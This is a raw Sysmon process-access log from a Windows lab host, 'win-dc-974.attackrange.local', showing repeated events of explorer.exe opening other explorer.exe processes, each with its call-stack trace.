16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246032Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246031Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246030Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246029Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246028Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246027Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246026Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246025Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246024Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246023Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246022Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246021Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246020Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246019Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246018Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246017Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246016Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246015Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246014Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246013Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246012Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246011Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246010Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246009Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246008Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246007Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246006Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246005Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 